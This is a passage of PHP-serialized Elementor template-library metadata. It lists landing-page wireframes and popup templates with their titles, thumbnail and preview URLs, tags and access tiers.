Pages\",\"NFT\",\"Products\",\"Virtual\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:117;a:19:{s:4:\"tmpl\";i:1424;s:2:\"id\";i:24255;s:5:\"title\";s:30:\"Happy Food Friends &#8211; NFT\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/05/Featured_Image.jpg\";s:12:\"tmpl_created\";i:1651525475;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/happy-food-friends-nft/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:3:\"NFT\";s:4:\"tags\";s:100:\"[\"Art\",\"Author\",\"Business\",\"Creative\",\"Design\",\"Gallery\",\"Landing Pages\",\"NFT\",\"Products\",\"Virtual\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:118;a:19:{s:4:\"tmpl\";i:1443;s:2:\"id\";i:24599;s:5:\"title\";s:27:\"Wireframe &#8211; Courses 1\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Courses-1.jpg\";s:12:\"tmpl_created\";i:1653989626;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/lp/wireframe-courses-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:180:\"[\"About\",\"Academy\",\"Booking\",\"Business\",\"Course Online\",\"Features\",\"Footer\",\"Landing Pages\",\"Online Service\",\"Professional\",\"School\",\"Services\",\"Subscribe\",\"Teacher\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:119;a:19:{s:4:\"tmpl\";i:1444;s:2:\"id\";i:24614;s:5:\"title\";s:28:\"Wireframe &#8211; Services 1\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-1-2.jpg\";s:12:\"tmpl_created\";i:1653990084;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:139:\"[\"About\",\"Business\",\"Contact\",\"Features\",\"Footer\",\"Form\",\"Header\",\"Landing Pages\",\"Online Service\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:120;a:19:{s:4:\"tmpl\";i:1445;s:2:\"id\";i:24629;s:5:\"title\";s:28:\"Wireframe &#8211; Services 2\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-2-2.jpg\";s:12:\"tmpl_created\";i:1653990132;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:123:\"[\"About\",\"Business\",\"Contact\",\"Features\",\"Footer\",\"Form\",\"Gallery\",\"Landing Pages\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:121;a:19:{s:4:\"tmpl\";i:1446;s:2:\"id\";i:24644;s:5:\"title\";s:27:\"Wireframe &#8211; Webinar 1\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Webinar-1.jpg\";s:12:\"tmpl_created\";i:1653990164;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/lp/wireframe-webinar-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:177:\"[\"About\",\"Academy\",\"Booking\",\"Conference\",\"Course Online\",\"Education\",\"Features\",\"Footer\",\"Form\",\"Landing Pages\",\"Online Event\",\"Online Service\",\"Subscribe\",\"Virtual\",\"Webinar\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:122;a:19:{s:4:\"tmpl\";i:1447;s:2:\"id\";i:24655;s:5:\"title\";s:28:\"Wireframe &#8211; Services 3\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-3-2.jpg\";s:12:\"tmpl_created\";i:1653990198;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:143:\"[\"About\",\"Agency\",\"Business\",\"Contact\",\"Footer\",\"Form\",\"Gallery\",\"Landing Pages\",\"Portfolio\",\"Professional\",\"Project\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:123;a:19:{s:4:\"tmpl\";i:1448;s:2:\"id\";i:24677;s:5:\"title\";s:28:\"Wireframe &#8211; Services 4\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-4.jpg\";s:12:\"tmpl_created\";i:1653990233;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:102:\"[\"About\",\"Business\",\"Contact\",\"Footer\",\"Form\",\"Landing Pages\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:124;a:19:{s:4:\"tmpl\";i:1449;s:2:\"id\";i:24687;s:5:\"title\";s:28:\"Wireframe &#8211; Products 1\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Products-1.jpg\";s:12:\"tmpl_created\";i:1653990273;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-products-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:128:\"[\"About\",\"Booking\",\"Business\",\"Clients\",\"Ecommerce\",\"Features\",\"Footer\",\"Landing Pages\",\"Products\",\"Sales\",\"Shop\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:125;a:19:{s:4:\"tmpl\";i:1450;s:2:\"id\";i:24706;s:5:\"title\";s:28:\"Wireframe &#8211; Services 5\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-5.jpg\";s:12:\"tmpl_created\";i:1653990322;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:149:\"[\"About\",\"Booking\",\"Consulting\",\"Contact\",\"Doctor\",\"Footer\",\"Form\",\"Header\",\"Landing Pages\",\"Online Service\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:126;a:19:{s:4:\"tmpl\";i:1451;s:2:\"id\";i:23604;s:5:\"title\";s:38:\"Classic | Subscribe | Nail Polish Shop\";s:9:\"thumbnail\";s:96:\"https://library.elementor.com/wp-content/uploads/2022/03/38-Subscribe-Nail-Polish-Shop-Small.jpg\";s:12:\"tmpl_created\";i:1660205114;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/classic-subscribe-nail-polish-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:20:\"[\"Blog\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:127;a:19:{s:4:\"tmpl\";i:1452;s:2:\"id\";i:23047;s:5:\"title\";s:46:\"Fly-In | Contact | Health &#038; Fitness eBook\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/fitness-ebook-small.jpg\";s:12:\"tmpl_created\";i:1660205149;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/fly-in-contact-health-fitness-ebook/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:28:\"[\"Contact\",\"Ebook\",\"Health\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:128;a:19:{s:4:\"tmpl\";i:1199;s:2:\"id\";i:18839;s:5:\"title\";s:27:\"Hello Bar | CTA | eCommerce\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2021/05/350x250.png\";s:12:\"tmpl_created\";i:1621870603;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/hello-bar-cta-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:41:\"[\"Ecommerce\",\"Online Shop\",\"Sale\",\"Shop\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:129;a:19:{s:4:\"tmpl\";i:1247;s:2:\"id\";i:21907;s:5:\"title\";s:50:\"Fly-In | Team Details  | Electronic Music Festival\";s:9:\"thumbnail\";s:104:\"https://library.elementor.com/wp-content/uploads/2022/03/Kit-8-electronic-music-festival-CTA-image-1.jpg\";s:12:\"tmpl_created\";i:1646660881;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:157:\"https://library.elementor.com/popups/fly-in-team-details-popup-electronic-music-festival/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:130;a:19:{s:4:\"tmpl\";i:1253;s:2:\"id\";i:22162;s:5:\"title\";s:46:\"Full Screen | Menu | Electronic Music Festival\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/8-music-festival-Team-Details.jpg\";s:12:\"tmpl_created\";i:1647272934;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:154:\"https://library.elementor.com/popups/full-screen-menu-popup-electronic-music-festival/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:131;a:19:{s:4:\"tmpl\";i:1254;s:2:\"id\";i:22172;s:5:\"title\";s:45:\"Classic | Discount | Health &#038; Beauty Spa\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/health-beauty-spa-small.jpg\";s:12:\"tmpl_created\";i:1647273547;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/popups/classic-discount-popup-health-beauty-spa/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:36:\"[\"Hair\",\"Health\",\"Sales\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:132;a:19:{s:4:\"tmpl\";i:1255;s:2:\"id\";i:22183;s:5:\"title\";s:44:\"Hello Bar | CTA | Environmental Organization\";s:9:\"thumbnail\";s:104:\"https://library.elementor.com/wp-content/uploads/2022/03/11-Environmental-Organization-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647274384;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:152:\"https://library.elementor.com/popups/hello-bar-cta-popup-environmental-organization/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:133;a:19:{s:4:\"tmpl\";i:1256;s:2:\"id\";i:22195;s:5:\"title\";s:39:\"Classic | Discount | Italian Restaurant\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/restaurant-small.jpg\";s:12:\"tmpl_created\";i:1647329432;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:147:\"https://library.elementor.com/popups/classic-discount-popup-italian-restaurant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:22:\"[\"Restaurant\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:134;a:19:{s:4:\"tmpl\";i:1257;s:2:\"id\";i:22210;s:5:\"title\";s:45:\"Bottom Bar | Discount | Technology Conference\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/tech-conference-small.jpg\";s:12:\"tmpl_created\";i:1647330423;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:153:\"https://library.elementor.com/popups/bottom-bar-discount-popup-technology-conference/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:38:\"[\"Conference\",\"Sales\",\"Save the Date\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:135;a:19:{s:4:\"tmpl\";i:1258;s:2:\"id\";i:22221;s:5:\"title\";s:32:\"Hello Bar | Menu | Tattoo Studio\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/tattoo-studio-small-1.jpg\";s:12:\"tmpl_created\";i:1647330705;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/hello-bar-menu-popup-tattoo-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:17:\"[\"Header\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:136;a:19:{s:4:\"tmpl\";i:1259;s:2:\"id\";i:22231;s:5:\"title\";s:37:\"Full Screen | Booking | Tattoo Studio\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/tattoo-studio-small.jpg\";s:12:\"tmpl_created\";i:1647331823;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/popups/full-screen-booking-popup-tattoo-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:32:\"[\"Booking\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:137;a:19:{s:4:\"tmpl\";i:1260;s:2:\"id\";i:22251;s:5:\"title\";s:34:\"Classic | Discount | Dental Clinic\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/dental-clinic-small.jpg\";s:12:\"tmpl_created\";i:1647332171;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/classic-discount-popup-dental-clinic/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:30:\"[\"Health\",\"Marketing\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:138;a:19:{s:4:\"tmpl\";i:1261;s:2:\"id\";i:22261;s:5:\"title\";s:34:\"Slide-In | Contact | Makeup Artist\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/20-Makeup-Artist-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647333946;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/slide-in-contact-popup-makeup-artist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:33:\"[\"Business\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:139;a:19:{s:4:\"tmpl\";i:1262;s:2:\"id\";i:22271;s:5:\"title\";s:24:\"Fly-In | CTA | Headphone\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/headphones-1-small.jpg\";s:12:\"tmpl_created\";i:1647334784;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/fly-in-cta-popup-headphone/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:41:\"[\"cta\",\"Ecommerce\",\"Marketing\",\"Product\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:140;a:19:{s:4:\"tmpl\";i:1263;s:2:\"id\";i:22277;s:5:\"title\";s:29:\"Classic | CTA | Online Course\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/online-course-2.jpg\";s:12:\"tmpl_created\";i:1647337110;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/classic-cta-popup-online-course/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:35:\"[\"Course Online\",\"cta\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:141;a:19:{s:4:\"tmpl\";i:1264;s:2:\"id\";i:22283;s:5:\"title\";s:40:\"Bottom Bar | Contact | Virtual Assistant\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/virtual-assistant-3.jpg\";s:12:\"tmpl_created\";i:1647337517;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:148:\"https://library.elementor.com/popups/bottom-bar-contact-popup-virtual-assistant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:33:\"[\"Business\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:142;a:19:{s:4:\"tmpl\";i:1265;s:2:\"id\";i:22289;s:5:\"title\";s:32:\"Fly-In | Contact | Private Tutor\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/private-tutor-4.jpg\";s:12:\"tmpl_created\";i:1647337676;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/fly-in-contact-popup-private-tutor/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:27:\"[\"Contact\",\"Course Online\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:143;a:19:{s:4:\"tmpl\";i:1266;s:2:\"id\";i:22295;s:5:\"title\";s:31:\"Classic |  Login | Login Travel\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/login-travel-6.jpg\";s:12:\"tmpl_created\";i:1647339467;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-login-popup-login-travel/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:9:\"[\"Login\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:144;a:19:{s:4:\"tmpl\";i:1267;s:2:\"id\";i:22301;s:5:\"title\";s:36:\"Full Screen | Login | Login Business\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/login-business-7.jpg\";s:12:\"tmpl_created\";i:1647339782;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:144:\"https://library.elementor.com/popups/full-screen-login-popup-login-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full 